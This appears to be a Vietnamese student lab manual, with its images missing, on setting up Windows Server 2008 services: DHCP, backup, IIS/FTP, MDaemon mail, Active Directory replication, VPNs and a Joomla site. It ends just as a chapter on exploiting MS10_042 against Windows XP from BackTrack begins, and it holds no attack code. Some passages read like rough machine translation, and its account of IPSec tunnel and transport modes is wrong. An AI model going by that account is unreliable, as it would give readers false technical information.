Xác nhận lại thông tin trước khi cài đặt dịch vụ DHCP. Bấm Install để cài đặt

- Cài đặt Role hoàn tất, và nhấn Close



3. Cấu hình DHCP

3.1. Tạo ScopVào Administrative Tools DHCP.

Nhấn chuột phải vào IPv4 và New Scope.

Hộp thoại New Scope hiện ra và Next.

-

Hộp thoại Scope Name và Điền tên của scope vào mục Name và nhấn Next.



- Hộp thoại IP Address Range, điền thông số range IP cấp phát và subnet mask

Next.

- Hộp thoại Lease Duration: thời gian thuê địa chỉ IP mặc định là 8 ngày



- Hộp thoại Configuration DHCP Options yêu cầu chúng ta cấu hình thông số

dịch vụ của scope ngay bây giờ hoặc để sau. Ở đây ta chọn No, I will configure

these option later và nhấn Next.

Bấm Fisnish để kết thúc

3.2 Thay đổi options của Scope- Xổ scope cần thao tác và chuột phải scope options Configure Options.

- Hộp thoại Scope Options hiện ra, ở trường Available Options là những thuộc tính

sẵn sàng mà chúng ta có thể thay đổi với những thuộc tính đã stick là những thuộc

tính đã được cấu hình trước đó.

- Chúng ta sẽ thử cấu hình default gateway lại cho scope này, chọn Router. Router

Options hiện ta cho chúng ta thêm xóa và edit với những thuộc tính khác cũng vậy.



Kiểm tra

CHƯƠNG 8: BACKUPWindows Server Backup là một thành phần được xây dựng trong

Windows Server 2008 , bao gồm Microsoft Management Console (MMC) snap-in, một công cụ dòng lệnh và Windows PowerShell cmdlets. Windows Server Backup giống như phiên bản tiền nhiệm của nó - Ntbackup (trên Windows Server 2000/2003) - cung cấp một giải pháp hoàn chỉnh để backup dữ liệu hàng ngày và khôi phục lại khi cần thiết.

Windows Server 2008 R2 có các tính năng mới mở rộng giúp bạn có thể backup, lưu trữ các bản backup và làm thế nào để phục hồi lại từ backup.



Lưu ý: Một điểm cần nhớ là không thể sử dụng Windows Server Backup để khôi phục bản sao lưu đã được tạo ra bởi Ntbackup. Tuy nhiên hiện có một phiên bản chỉ đọc của Ntbackup (miễn phí) có thể giúp bạn khôi phục dữ liệu được tạo ra bởi Ntbackup.

Backup với Windows Server Backup

Bạn có thể sử dụng Windows Server Backup để backup toàn bộ server (tất cả các volume), một danh sách lựa chọn các volume, một phân vùng hệ thống hoặc một thư mục/file cụ thể.

Lưu ý: Trong Windows Server 2008 RTM bạn sẽ bị hạn chế những mục có thể backup, chỉ có vài lựa chọn là volume và toàn bộ server.

Bạn có thể sử dụng Windows Server Backup để tạo và quản lý các bản backup cho một máy tính cục bộ hoặc từ xa, có thể lên lịch trình để chạy backup tự động.

Cài đặt Windows Server Backup

Khi thêm tính năng Windows Server Backup Features và các thành phần cấp dưới, bạn cần cài đặt các công cụ sau:

Windows Server Backup Microsoft Management Console (MMC) snap-in Wbadmin command-line tool Windows PowerShell cmdlets for Windows Server Backup

Để cài đặt Windows Server Backup, có thể sử dụng một trong 3 phương pháp sau:

Sử dụng Server Manager Sử dụng Servermanagercmd.exe Sử dụng PowerShell

Để cài đặt Windows Server Backup, đăng nhập vào máy tính bằng tài khoản Administrator hoặc tài khoản có cấp quyền quản trị.

1. Cài đặt Windows Server Backup sử dụng Server Manager

- Mở Server Manager

- Kích Features

- Kích Add Features

- Trong trang Add Features Wizard, cuộn chuột xuống dưới và chọn Windows Server Backup features. Nếu bạn cũng muốn sử dụng các mẫu



lệnh PowerShell, chọn thêm Command Line Tools. Bạn không cần việc thêm này nếu chỉ muốn sử dụng GUI hoặc công cụ dòng lệnh WBADMIN. Kích Next.

Trong hộp thoại Server Manager -> Add Features



Trong hộp thoại Add Features Wizard -> Windows Server backup features.

- Trong trang Confirm Installation Selections, kích Install.



Click close.

- Không cần khởi động lại server sau khi thiết lập xong.



2. Cài đặt Windows Server Backup sử dụng Servermanagercmd.exeSử dụng lệnh Servermanagercmd.exe là cách dễ dàng, tuy nhiên lệnh này có

thể bị phản đối trong các phiên bản Windows sau này, do đó không được sử dụng

nó quá nhiều...

- Mở cửa sổ lệnh với quyền quản trị cấp cao (chuột phải vào CMD và chọn Run as

Administrator).

- Nhập: servermanagercmd -i Backup-Features

3. Cài đặt Windows Server Backup sử dụng PowerShellTrong Windows Server 2008 R2, PowerShell được cài đặt mặc định. Tuy

nhiên, để cài đặt các role bằng công cụ này, bạn cần phải import vào module

Server Manager.

- Mở một cửa sổ PowerShell với quyền cấp cao (chuột phải vào PowerShell và

chọn Run as Administrator)

- Nhập: Import-Module servermanager

- Sau khi import, nhập: Add-WindowsFeature Backup-Features



4. BACKUP windows thông thường.Tiến hành phân chia ổ đĩa. Start-> Server Manager -> Stor Age -> Disk

Management -> Shink volume.



Chọn 10000 và Shink tiếp theo.

Mở new simple volume.

Trong New Simple Volume Wizard -> Next.



Trong New Simple Volume Wizard -> Next

Trong New Simple Volume Wizard ->Đánh dấu vào ô Pefom a quick fomat.



Trong New Simple Volume Wizard -> Finish

Chọn Backup Once.



Trong hộp thoại Backup Once Wizard ->Next.

Trong hộp thoại Backup Once Wizard -> Next.




Trong hộp thoại Backup Once Wizard. Chọn ổ đĩa mới chia-> Next.



Trong hộp thoại Backup Once Wizard -> Next -> Yes.




Trong hộp thoại Backup Once Wizard -> Backup.



Ta thử xóa thư mục nào đó trong ổ đĩa.

Chọn thư mục Recover trong hộp thoại Windows Server backup.



Trong hộp thoại Recovery Wizard. Click Next.



Click Next.

Click Next.



Trong hộp thoại Recovery Wizard. Chọn thư mục mình muốn khôi phục lại->

Next.

Trong hộp thoại Recovery Wizard. Click Next.



Trong hộp thoại Recovery Wizard. Chọn recover.



Trong hộp thoại Recovery Wizard. Chọn close.

Vào computer kiểm tra xem thư mục hien co được khôi phục lại được chưa.

Kiểm tra.



CHƯƠNG 9: IIS-WEB-FTP

I. Tiến hành cài đặt web iis và FTP.Vào Server Manager (Start => Programs => Administrative Tools => Server

Manager).

Click next



Chuột phải vào Roles , bên cột trái chọn Add Roles.Trong bản Add Roles Wizard

đánh dấu IIS (WebServer) -> install



Click Next.

Chọn Basic Authemtication-> Next.



Chọn FTP Publishing Server -> Next.



Click Install.

II. cấu hình Web IIS Khởi động Internet Information Services (IIS) Manager . này được tìm thấy

bằng cách nhấn vào nút "Start"> Administrative Tools > Internet Information

Services (IIS) Manager.



Trong hộp thoại Internet Information Services (IIS) Manager -> site -> add web

site



Tạo thư mục Athena.edu.vn trong ổ đĩa C-> tạo thư mục index.htm



Vào windows 7 truy cập vào trang www.athena.edu.vn


http://www.athena.edu.vn/


III. cấu hình FTP.Tạo thư mục FTP, thư mục này share file cho nó.

Chuột phải vào FTP -> chọn Properties. Trong FTP properties -> Advanced

Sharing. Tick vào share this folder. Chọn Allow.



Khởi động Internet Information Services (IIS) 6.0 Manager. này được tìm

thấy bằng cách nhấn vào nút "Start"> Administrative Tools > Internet Information

Services (IIS) 6.0 Manager.



chọn Add FTP Site



Trong FTP Site Creation Wizard -> Next.

Nhập vào tên bất kì. Vd: athena



Trong FTP Site Creation Wizard -> nhập ip của máy: 192.168.1.1 -> Next.

Trong FTP Site Creation Wizard -> Next.



Chọn đường dẫn của thư mục FTP.

Trong FTP Site Creation Wizard -> đánh dấu vào Read và Wite -> Next.



Trong FTP Site Creation Wizard -> Finish.

Trong Internet Information Services (IIS) 6.0 Manager -> start thư mục vừa

mới tạo.



Qua windows 7 vào ftp://192.168.1.1


ftp://192.168.1.1/


CHƯƠNG 10: MAIL

I. Chuẩn bị:1 máy server windows server 2008

Địa chỉ ip: 192.168.1.1

1 máy client windows 7

Địa chỉ ip: 192.168.1.2

II. Tiến hành cài đặt MDeamon v10. Khởi chạy file exe.

MDaemon, chương trình quản trị email server của Alt-N Technologies, có

rất nhiều đặc tính tác dụng phong phú, linh hoạt, an toàn và dễ sử dụng. Đây là một

trong những công nghệ quản trị email có giá trị nhất dành cho các tổ chức có từ 6

cho tới cả vài ngàn người dùng và bao gồm cả các nhà cung cấp dịch vụ Internet.

Trong bài viết đầu về MDaemon, mình sẽ trình bay qua về cách cài đặt MDaemon

trên Windows Server 2008.

Khi chạy Setup, màng hình Welcome xuất hiện. Nhấn Next.

Đọc sơ qua một số quy định của nó rồi nhấn I Agree.



Chọn vị trí cài đặt của MDaemon rồi nhấn Next.

Click Next



Click Next

Nhập vào domain là Athena.edu.vn -> Next



Khai báo tài khoản Administrator cho Mail Server.

Nhập địa chỉ DNS của server vào.



Chọn Set up MDaemon as an auto-starting system service nếu bạn muốn

MDaemon Mail Server khởi động cùng với Server.

Quá trình cài đặt diễn ra



Click Finish.

III. tiến hành gửi nhận mail.Khởi động MDeamon



Nếu quá trình cài đặt thành công, bạn sẽ có kết quả như hình dưới đây.



Tick bỏ ô Requite strong password -> OK



Account -> New Account

Nhập tên cho client ->OK. Sau đó chon Account -> edit



Truy cập vào www.athena.edu.vn:3000


http://www.athena.edu.vn:3000/


Bên phía client.



Tiến hành soạn thư gửi qua server.

Server nhận từ client.



Soạn thư gửi từ server qua client.

Client nhận từ Server

Tham khảo video tại: http://www.youtube.com/watch?v=snVjWp_PpTk


http://www.youtube.com/watch?v=snVjWp_PpTk


CHƯƠNG 11: MÔ HÌNH MULTIMASTER.I. Replication Multimaster.( đa chủ nhân rộng)

Active Directory sử dụng sao chép đa để thực hiện việc đồng bộ hóa thông tin thư mục. Đúng sao chép đa có thể được đối với các dịch vụ thư mục khác sử dụng một master-slave cách tiếp cận để cập nhật tất cả các bản cập nhật đó phải được thực hiện cho các bản sao chủ của thư mục và sau đó được nhân rộng đến các bản sao nô lệ. Hệ thống này là đủ cho một thư mục mà có một số lượng nhỏ các bản sao và cho một môi trường mà tất cả các thay đổi có thể được áp dụng trực thuộc Trung ương. Nhưng phương pháp này không quy mô ngoài tổ chức quy mô nhỏ cũng không đáp ứng nhu cầu của các tổ chức phân cấp. Với Active Directory, không có một bộ điều khiển tên miền là bậc thầy. Thay vào đó, tất cả các bộ điều khiển miền trong một miền là tương đương. Thay đổi có thể được thực hiện cho bất kỳ bộ điều khiển miền, không giống như một hệ thống duy nhất-master, mà sự thay đổi phải được thực hiện với một máy chủ. Trong hệ thống đơn chủ, máy chủ chính sao chép các thông tin cập nhật cho tất cả các máy chủ thư mục khác trong miền.

Với sao chép đa, nó không phải là cần thiết cho tất cả các bộ điều khiển miền để nhân rộng với tất cả các bộ điều khiển tên miền khác. Thay vào đó, hệ thống thực hiện một cách mạnh mẽ các kết nối với bộ điều khiển xác định miền tái tạo mà các bộ điều khiển tên miền khác để đảm bảo rằng mạng không bị quá tải với lưu lượng truy cập sao chép và nhân rộng độ trễ không phải là quá dài mà nó gây ra sự bất tiện cho người sử dụng. Tập hợp các kết nối thông qua đó thay đổi được nhân rộng để điều khiển tên miền trong một doanh nghiệp được gọi là cấu trúc liên kết nhân rộng .

Khả năng cập nhật đa chủ cung cấp tính sẵn sàng cao của ghi vào đối tượng thư mục bởi vì một số máy chủ có thể chứa các bản sao có thể ghi của một đối tượng. Mỗi bộ điều khiển miền trong phạm vi có thể chấp nhận thông tin cập nhật một cách độc lập, không giao tiếp với bộ điều khiển tên miền khác. Hệ thống giải quyết bất kỳ cuộc xung đột trong bản cập nhật cho một đối tượng thư mục cụ thể. Nếu cập nhật hết và sao chép tiếp tục, tất cả các bản sao của một đối tượng cuối cùng đạt được giá trị như nhau.

Cách thức mà các cửa hàng dịch vụ một thư mục thông tin trực tiếp xác định hiệu suất và khả năng mở rộng của dịch vụ thư mục. Dịch vụ thư mục phải xử lý một số lượng lớn các truy vấn so với số lượng các bản cập nhật thì phải xử lý. Một tỷ lệ điển hình của các truy vấn để cập nhật là 99:1. Bằng cách tạo ra nhiều bản sao



của thư mục và giữ bản sao phù hợp, các dịch vụ thư mục có thể xử lý nhiều truy vấn mỗi giây.

Sao chép đa cung cấp những ưu điểm sau hơn sao chép đơn tổng thể:

Nếu một domain controller trở nên không thể hoạt động, bộ điều khiển tên miền khác có thể tiếp tục cập nhật các thư mục. Trong sao chép đơn-master, nếu bộ điều khiển tên miền chính trở nên không thể hoạt động, cập nhật thư mục có thể không diễn ra. Ví dụ, nếu máy chủ không giữ mật khẩu và mật khẩu của bạn đã hết hạn, bạn có thể không thiết lập lại mật khẩu của bạn và do đó bạn không thể đăng nhập vào tên miền.

Các máy chủ có khả năng làm thay đổi thư mục, mà trong Windows 2000 là bộ điều khiển miền, có thể được phân phối trên mạng và có thể được đặt tại nhiều địa điểm vật lý.

II. cấu hình Multimaster.

1. chuẩn bị.- 2 máy server windows 2008

- 1 PC có domain: Athena.edu.vn. ip : 192.168.1.1

- 1PC chưa domain. Ip: 192.168.1.2

2. cấu hình.PC 1



PC 2

3. join domain PC2 vào PC1.Tiến hành join domain từ PC2 vào PC1 với domain là Athena.edu.vn.

Mở computer -> properties .



Chọn Changes setting.



Nhập vào:

Computer name: multimaster

Domain: Athena.edu.vn.

Ok.



Nhập quyền administrator và pass vào.

Nhấp OK.



Nhấp OK.

Khởi động lại máy.



3. tiến hành nâng cấp domain cho PC1.Vào start -> run -> dcpromo.



Trong hộp thoại Active Directory Domain Services Installation Wizard -> Next



Trong hộp thoại Active Directory Domain Services Installation Wizard -> Next.

Trong hộp thoại Active Directory Domain Services Installation Wizard -> chọn Exting format.



Chọn set-> nhập quyền admin vào.





Trong hộp thoại Active Directory Domain Services Installation Wizard -> Next



Chọn Yes.




Trong hộp thoại Active Directory Domain Services Installation Wizard -> nhập pass vào.




Trong hộp thoại Active Directory Domain Services Installation Wizard -> check vào Reboot on completion.

Khởi động lại máy.



4. Kiểm tra đồng bộ PC2 và PC1.PC1.



PC2.



CHƯƠNG 12: TRIỂN KHAI VPN

I. Tìm hiểu VPNGiải pháp VPN (Virtual Private Network) được thiết kế cho những tổ chức

có xu hướng tăng cường thông tin từ xa vì địa bàn hoạt động rộng (trên toàn quốc hay toàn cầu). Tài nguyên ở trung tâm có thể kết nối đến từ nhiều nguồn nên tiết kiệm được được chi phí và thời gian.

Một mạng VPN điển hình bao gồm mạng LAN chính tại trụ sở (Văn phòng chính), các mạng LAN khác tại những văn phòng từ xa, các điểm kết nối (như 'Văn phòng' tại gia) hoặc người sử dụng (Nhân viên di động) truy cập đến từ bên ngoài.



1. Khái niệm.Mạng riêng ảo hay VPN (Virtual Private Network) là một mạng dành riêng

để kết nối các máy tính lại với nhau thông qua mạng Internet công cộng. Những máy tính tham gia mạng riêng ảo sẽ "nhìn thấy nhau" như trong một mạng nội bộ - LAN (Local Area Network).

Internet là một môi trường công cộng, việc chia sẻ dữ liệu có tính riêng tư thông qua Internet là cực kỳ nguy hiểm vì những dữ liệu đó có thể dễ dàng bị rò rỉ, bị ăn cắp... Mạng riêng ảo là giao thức trợ giúp việc kết nối các máy tính lại với nhau thông qua một kênh truyền dẫn dữ liệu (tunel) riêng đã được mã hóa.

Mạng riêng ảo giúp bảo vệ dữ liệu trong khi chúng được truyền trên Internet vì vậy mạng riêng ảo thường được ứng dụng trong các trường hợp sau:

Làm việc từ xa: Truy cập từ xa thông qua Internet vào mạng của công ty để chia sẻ dữ liệu cũng như thực thi các ứng dụng nội bộ.

Kết nối nhiều mạng với nhau (Site-to-Site): Nếu công ty có nhiều văn phòng, việc kết nối các mạng lại với nhau thành một mạng thống nhất sẽ đem lại hiệu quả ấn tượng trong việc quản lý & chia sẻ thông tin.

Tạo phiên làm việc an toàn: Mạng riêng ảo là giải pháp tốt & với chi phí thấp cho một số công việc đòi hỏi tính bảo mật cao như quản trị máy chủ, website, cơ sở dữ liệu...

Nếu thường xuyên làm việc trên Internet & thông tin là tài sản vô giá, bạn nên ứng dụng mạng riêng ảo vào công việc của mình.



2. Các loại VPN.Có hai loại phổ biến hiện nay là VPN truy cập từ xa (Remote-Access ) và

VPN điểm-nối-điểm (site-to-site)

VPN truy cập từ xa còn được gọi là mạng Dial-up riêng ảo (VPDN), là một kết nối người dùng-đến-LAN, thường là nhu cầu của một tổ chức có nhiều nhân viên cần liên hệ với mạng riêng của mình từ rất nhiều địa điểm ở xa. Ví dụ như công ty muốn thiết lập một VPN lớn phải cần đến một nhà cung cấp dịch vụ doanh nghiệp (ESP). ESP này tạo ra một máy chủ truy cập mạng (NAS) và cung cấp cho những người sử dụng từ xa một phần mềm máy khách cho máy tính của họ. Sau đó, người sử dụng có thể gọi một số miễn phí để liên hệ với NAS và dùng phần mềm VPN máy khách để truy cập vào mạng riêng của công ty. Loại VPN này cho phép các kết nối an toàn, có mật mã.

Hình minh họa cho thấy kết nối giữa Văn phòng chính và "Văn phòng" tại gia hoặc nhân viên di động là loại VPN truy cập từ xa).

VPN điểm-nối-điểm là việc sử dụng mật mã dành cho nhiều người để kết nối nhiều điểm cố định với nhau thông qua một mạng công cộng như Internet. Loại này có thể dựa trên Intranet hoặc Extranet. Loại dựa trên Intranet: Nếu một công ty có vài địa điểm từ xa muốn tham gia vào một mạng riêng duy nhất, họ có thể tạo ra một VPN intranet (VPN nội bộ) để nối LAN với LAN. Loại dựa trên Extranet: Khi một công ty có mối quan hệ mật thiết với một công ty khác (ví dụ như đối tác cung cấp, khách hàng...), họ có thể xây dựng một VPN extranet (VPN mở rộng) kết nối LAN với LAN để nhiều tổ chức khác nhau có thể làm việc trên một môi trường chung.

Trong hình minh họa trên, kết nối giữa Văn phòng chính và Văn phòng từ xa là loại VPN Intranet, kết nối giữa Văn phòng chính với Đối tác kinh doanh là VPN Extranet.

3.Bảo mật trong VPNTường lửa (firewall) là rào chắn vững chắc giữa mạng riêng và Internet. Bạn

có thể thiết lập các tường lửa để hạn chế số lượng cổng mở, loại gói tin và giao thức được chuyển qua. Một số sản phẩm dùng cho VPN như router 1700 của Cisco có thể nâng cấp để gộp những tính năng của tường lửa bằng cách chạy hệ điều hành Internet Cisco IOS thích hợp. Tốt nhất là hãy cài tường lửa thật tốt trước khi thiết lập VPN.



Mật mã truy cập là khi một máy tính mã hóa dữ liệu và gửi nó tới một máy tính khác thì chỉ có máy đó mới giải mã được. Có hai loại là mật mã riêng và mật mã chung.

Mật mã riêng (Symmetric-Key Encryption): Mỗi máy tính đều có một mã bí mật để mã hóa gói tin trước khi gửi tới máy tính khác trong mạng. Mã riêng yêu cầu bạn phải biết mình đang liên hệ với những máy tính nào để có thể cài mã lên đó, để máy tính của người nhận có thể giải mã được.

Mật mã chung (Public-Key Encryption) kết hợp mã riêng và một mã công cộng. Mã riêng này chỉ có máy của bạn nhận biết, còn mã chung thì do máy của bạn cấp cho bất kỳ máy nào muốn liên hệ (một cách an toàn) với nó. Để giải mã một message, máy tính phải dùng mã chung được máy tính nguồn cung cấp, đồng thời cần đến mã riêng của nó nữa. Có một ứng dụng loại này được dùng rất phổ biến là Pretty Good Privacy (PGP), cho phép bạn mã hóa hầu như bất cứ thứ gì.

Giao thức bảo mật giao thức Internet (IPSec) cung cấp những tính năng an ninh cao cấp như các thuật toán mã hóa tốt hơn, quá trình thẩm định quyền đăng nhập toàn diện hơn.

IPSec có hai cơ chế mã hóa là Tunnel và Transport. Tunnel mã hóa tiêu đề (header) và kích thước của mỗi gói tin còn Transport chỉ mã hóa kích thước. Chỉ những hệ thống nào hỗ trợ IPSec mới có thể tận dụng được giao thức này. Ngoài ra, tất cả các thiết bị phải sử dụng một mã khóa chung và các tường lửa trên mỗi hệ thống phải có các thiết lập bảo mật giống nhau. IPSec có thể mã hóa dữ liệu giữa nhiều thiết bị khác nhau như router với router, firewall với router, PC với router, PC với máy chủ.

Máy chủ AAA

AAA là viết tắt của ba chữ Authentication (thẩm định quyền truy cập), Authorization (cho phép) và Accounting (kiểm soát). Các server này được dùng để đảm bảo truy cập an toàn hơn. Khi yêu cầu thiết lập một kết nối được gửi tới từ máy khách, nó sẽ phải qua máy chủ AAA để kiểm tra. Các thông tin về những hoạt động của người sử dụng là hết sức cần thiết để theo dõi vì mục đích an toàn.

4.Sản phẩm công nghệ dành cho VPNTùy vào loại VPN (truy cập từ xa hay điểm-nối-điểm), bạn sẽ cần phải cài

đặt những bộ phận hợp thành nào đó để thiết lập mạng riêng ảo. Đó có thể là:



- Phần mềm cho desktop của máy khách dành cho người sử dụng từ xa.

- Phần cứng cao cấp như bộ xử lý trung tâm VPN hoặc firewall bảo mật PIX.

- Server VPN cao cấp dành cho dịch vụ Dial-up.

- NAS (máy chủ truy cập mạng) do nhà cung cấp sử dụng để phục vụ người sử dụng từ xa.

- Mạng VPN và trung tâm quản lý.

5. Bộ xử lý trung tâm VPNCó nhiều loại máy xử lý VPN của các hãng khác nhau, nhưng sản phẩm của

Cisco tỏ ra vượt trội ở một số tính năng. Tích hợp các kỹ thuật mã hóa và thẩm định quyền truy cập cao cấp nhất hiện nay, máy xử lý VPN được thiết kế chuyên biệt cho loại mạng này. Chúng chứa các module xử lý mã hóa SEP, cho phép người sử dụng dễ dàng tăng dung lượng và số lượng gói tin truyền tải. Dòng sản phẩm có các model thích hợp cho các mô hình doanh nghiệp từ nhỏ đến lớn (từ100 cho đến 10.000 điểm kết nối từ xa truy cập cùng lúc).

Bộ xử lý trung tâm VPN số hiệu 3000 của hãng Cisco.

6. Router dùng cho VPNThiết bị này cung cấp các tính năng truyền dẫn, bảo mật. Dựa trên hệ điều

hành Internet IOS của mình, hãng Cisco phát triển loại router thích hợp cho mọi trường hợp, từ truy cập nhà-tới-văn phòng cho đến nhu cầu của các doanh nghiệp quy mô lớn.

7. Tường lửa PIX của CiscoFirewall trao đổi Internet riêng (Private Internet Exchange) bao gồm một cơ

chế dịch địa chỉ mạng rất mạnh, máy chủ proxy, bộ lọc gói tin, các tính năng VPN và chặn truy cập bất hợp pháp.



Thay vì dùng IOS, thiết bị này có hệ điều hành với khả năng tổ chức cao, xoay sở được với nhiều giao thức, hoạt động rất mạnh bằng cách tập trung vào IP.

II. VPN client to site.

1. Cài đặt.Start -> Administrative Tools -> Routing and Remote Access. Trong hộp thoại này chạy Configure and Enable routing and remote access.

Trong routing and remote access server setup wizad -> Next.



Trong routing and remote access server setup wizad -> chọn Custum configuration.



Trong routing and remote access server setup wizad -> chọn VPN access và LAN routing.

Trong routing and remote access server setup wizad -> nhấn Fisnish.



Khởi chạy routing.

Trong routing and remote access server setup wizad -> chọn Fisnish.



Trong routing and remote access -> chọn Properties.



Ta tiến hành add thêm IP cho routing.



Tiến hành tạo use. Start -> Administrative Tools-> Active Directory…



Chọn new tạo user mới.



Tạo user có tên hien 123 và password.



Kiểm tra Active Directory Users and Computers đã tạo thành công.



Trong Active Directory Users and Computers -> Properties user vừa tạo.

Chọn Allow Access.



Windows 7 vào Netword and Sharing Center.



Sau khi hoàn thành đăng nhập user vừa tạo trên windows 7.



III.VPN SITE TO SITE

1. chuẩn bị: - 2 windows server 2008

-2 windows 2007

+ máy PC 1 windows 2007 co ip 192.168.1.2. máy này sẻ ping thông với PC 2 là windows server 2008 có địa chỉ ip là 192.168.1.1.

+ máy PC 3 windows 2007 co ip 192.168.2.2 máy này sẻ ping thông với PC 4 là windows server 2008 có địa chỉ ip là 192.168.2.1.

2. Đặt IP cho 4 máyMáy PC 1



Máy PC 2

Máy PC 3



Máy PC 4

3. Tiến hành cấu hình trên 2 server.Trên server 1 ( PC 2).



Trên server 2 ( PC3).



Khởi động Routing and Remote Access



Trong Routing and Remote Access -> Alls Task -> Star.



Trong Routing and Remote Access ->Configure and Enable ….

Trong Routing and Remote Access Service Setup Wizard -> Next.



Trong Routing and Remote Access Service Setup Wizard -> Custom…

Trong Routing and Remote Access Service Setup Wizard chọn VPN access, Demand-dial connections và Lan routing.



Trong Routing and Remote Access Service Setup Wizard -> Finish.

Trong Routing and Remote Access -> Start servise.

Trong Routing and Remote Access -> chuột phải Netword -> new Demand…



Click Next.



176



Click Finish.

Click Porperties.



Bên server 2( PC 3) cũng làm tương tự như server 1(PC2).



Trong Routing and Remote Access Service Setup Wizard -> Next

Trong Routing and Remote Access Service Setup Wizard -> Custom…



Trong Routing and Remote Access Service Setup Wizard -> tick VPN, Demand.. và Lan routing.

Trong Routing and Remote Access -> New…



Click Next.



Bên server 1.



Bên server 2.



4. Kiểm tra.Lúc này từ PC1 sẻ ping thông qua PC4.

CHƯƠNG 13: TRIỂN KHAI VPN TRÊN VPS

I. Cấu hình VPN.Start -> Administrative Tools -> Ruoting and Remote Access.

Chuột phải chọn Config ….192



Trong hộp thoại Ruoting and Remote Access. Server Setup Wizard -> Next.

Trong hộp thoại Ruoting and Remote Access. Server Setup Wizard -> Custom Configuration.



Trong hộp thoại Ruoting and Remote Access. Server Setup Wizard-> chọn VPN access và LAN ruoting.

Trong hộp thoại Ruoting and Remote Access. Server Setup Wizard -> Next



Chọn Propesties.

Chọn Static addess pool.



Add IP vào.

Tiến hành tạo User thuhien1 và thuhien2.



Chọn Allow access.

Chọn Properties.

Chọn Allow Access.



II. Cài đặt VPN cho client.

1. Client xp1.Trên máy ảo windows XP1. Trong hộp thoãi New Connection Wizard -> chọn Crea….



Trong hộp thoãi New Connection Wizard -> Next

Trong hộp thoãi New Connection Wizard-> Connect to the network at my wordplaces-> Next.



Trong hộp thoãi New Connection Wizard -> Viatual Privale Netword connection. -> Next.

Trong hộp thoãi New Connection Wizard -> nhập Company Name: client 1 den vps



Trong hộp thoãi New Connection Wizard -> nhập Ip của VPS: 14.0.21.222.

Trong hộp thoãi New Connection Wizard -> chọn Anyone use.



Trong hộp thoãi New Connection Wizard -> tick vào Add a shortcut the connection to my desktop -> Fisnish.

Sau khi hoàn thành sẻ đăng nhập vào user name và password -> Connect.



Trên VPN vừa tạo chuột phải chọn Status.

IP VPS cấp là 10.0.0.101.



2. Client xp 2.Trên máy ảo windows XP2. Trong hộp thoãi New Connection Wizard -> chọn Crea….



Trong hộp thoãi New Connection Wizard -> Next.

Trong hộp thoãi New Connection Wizard -> Connect to the netword at my wordplace.-> Next.



Trong hộp thoại New Connection Wizard -> nhập Company name : client 2 den vps -> Next.

Trong hộp thoại New Connection Wizard -> nhập Ip của vps: 14.0.21.222



Trong hộp thoại New Connection Wizard -> chọn Anyone use-> Next.

Trong hộp thoại New Connection Wizard -> tick vào add… -> Fisnish.



Sau khi hoàn thành nhập user name và password VPN vừa tạo.

Chuột phải vào VPN chọn Status.



VPS cấp cho ip Vpn là: 10.0.0.102



III. Kiểm tra.Tiến hành ping từ windows XP 1 qua windows XP 2 sẻ thông.

CHƯƠNG 14: MAIL TRÊN VPS.I. Cài đặt MDmoon v10.

Các bước cài đặt đã hướng dẫn trên localhost.

II. Cấu hình MDmoon v10.

1. khởi động MDmoon v10Start -> Programs -> MDmoon -> Start MDmoon.



2. Kiểm tra Domain.Vào Setup -> Default Domain / Servers…



Tick vào domain -> kiểm tra.

3. Tạo Account.Account -> name: thuhien-> Email : [email protected] -> password -> ok


mailto:[email protected]


4. Kiểm tra.

Vào trình duyệt web đăng nhập nguyenthithuhien.tk:3000.

Tạo mail tiến hành gửi qua gmail. [email protected]


mailto:[email protected]


Vào gmail kiểm tra xem có nhận được hay chưa



Đã nhận được -> tiến hành gửi lại ->Ok



CHƯƠNG 15: WEB TRÊN VPS

I. Cài đặt.

1. Chạy xampp.Chạy file.exe -> run.



Chọn Install.



Sau khi chạy xong Running Apache voi MySql -> tick vào Admin.



Nhập joomla vào chọn Creation.

Thành công



2. Tạo xampp.Copy source joomla pass vào hdots và đổi tên là Athena.



II. thiết kế web: nguyenthithuhien.tk/athenaVào trình duyệt web chạy: nguyenthithuhien.tk/Athena -> Ok

Chọn Next.



Chọn Mysql, user name: root, Data…: Athena-> Next.



Next.

Nhập web doanh nghiep, gmail, pass vào –> Next.



Chọn Remote install… -> site.

Tạo thành công trang web nguyenthithuhien.tk/ Athena.



CHƯƠNG 16: THIẾT KẾ WEB BẰNG JOOMLA.

1. Cài đặt joomla.

Thử kiểm tra trên máy thật.



2. thiết kế trang chủ



3. Tạo template admin.



Sau đó chọn view site. Truy cập vào trang Athena.

Ta vào lại localhost/administrator để tiếp tục công việc.

4. Tạo bài viết.



Chọn new, điền đầy đủ thông tin vào. Copy phần giới thiệu từ trang Athena.edu.vn

vào.

Chon Save& close.

Chọn New

Tạo thư mục cho tin tức đào tạo. các thư mục tin tức công nghệ, video Athena cũng

làm tương tự.



Chọn Save & close.

Trong các thư mục TIN TỨC ĐÀO TẠO … có các thư mục con.

Chọn new



Save & close. Làm tương tự cho các thư mục khác.

5.Tạo menu.Tạo menu. Menu -> main menu.



Vào Home. Điền các thông tin vào.

Sau đó save & new.



Chọn Single Article. Sau đó điền đầy đủ thông tin vào.



Vào Select change chọn giới thiệu trung tâm Athena.

Chọn Save & new. Vào select. Chọn Categery Blog cho Tin tức đào tạo…



Chọn Save & new. Làm tương tự cho các thư mục khác.

6. Hướng dẫn đưa manu ra trang chủ.



Truy cập vào localhost/athena



7. Cài đặt và hiển thị module trình diển ảnh.



Tiến hành add a site vào.



Chọn Save & close.

8. Cài đặt và hiển thị tin tức cập nhật.

Chọn Save.



Save lại và truy cập trang chủ.

9. Cập nhật tin tức cho website.



Chọn save. Truy cập vào trang chủ.

10. Cài đặt và hiển thị tin tức mới nhất.



Tạo thư mục tiêu điểm.



Chọn on all pages.



Save lại. truy cập vào trang chủ.

11. Hiển thị doanh mục tin tức.



Điền đầy đủ thông tin vào.



Save & close. Truy cập vào xem trang chủ.

Lúc này chưa truy cập được. ta vào

Chọn disable



Truy cập lại là vào được

12. Tạo thư mục hỗ trợ Online



Save & close



Truy cập vào trang chủ xem

13. Tạo thư mục địa chỉ cho Athena.

Chọn new



Truy cập vào trang chủ.

Tham khảo video tại: http://www.youtube.com/watch?v=nCUZ-9DxMKc

CHƯƠNG 17: BẢO MẬT WINDOWS.

I. Khai thác lỗ hổng trên Windows XP với mã lỗi MS10_042Chuẩn bị 2 máy ảo: Windows XP (nạn nhân) và máy Back Track 5r3 (máy tấn công nạn nhân)

Trên máy Back Track cấu hình địa chỉ IP trong bài lab này cho máy là: 192.168.147.130

